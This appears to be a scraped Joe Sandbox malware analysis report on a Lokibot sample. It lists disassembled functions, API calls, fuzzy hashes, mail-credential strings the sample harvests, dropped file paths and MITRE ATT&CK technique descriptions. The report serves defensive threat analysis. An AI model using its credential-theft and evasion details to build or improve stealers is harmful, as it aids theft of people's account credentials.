RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopAccount, xrefs: 0040D0B6
SmtpPassword, xrefs: 0040D117
PopPort, xrefs: 0040D0A7
SmtpAccount, xrefs: 0040D0FA
EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099
SmtpPort, xrefs: 0040D0EB
PopPassword, xrefs: 0040D0D0
SmtpServer, xrefs: 0040D0DC
Technology, xrefs: 0040D08D

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mcx2Xk0fqn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Mcx2Xk0fqn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Mcx2Xk0fqn.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Mcx2Xk0fqn.exe

Function 00E70006 Relevance: 4.8, APIs: 3, Instructions: 254
COMMON

Function 00E70090 Relevance: 4.7, APIs: 3, Instructions: 207
COMMON

Function 00E77570 Relevance: 3.9, Strings: 3, Instructions: 104
COMMON

Function 00A6AA3F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Function 00A6ACAC Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Function 00A6ADA5 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Function 00A6AE9C Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Function 00A6B056 Relevance: 1.6, APIs: 1, Instructions: 80
processCOMMON

Function 00A6B082 Relevance: 1.6, APIs: 1, Instructions: 68
processCOMMON

Function 00A6AB0C Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Function 00A6ADD2 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 00A6A833 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre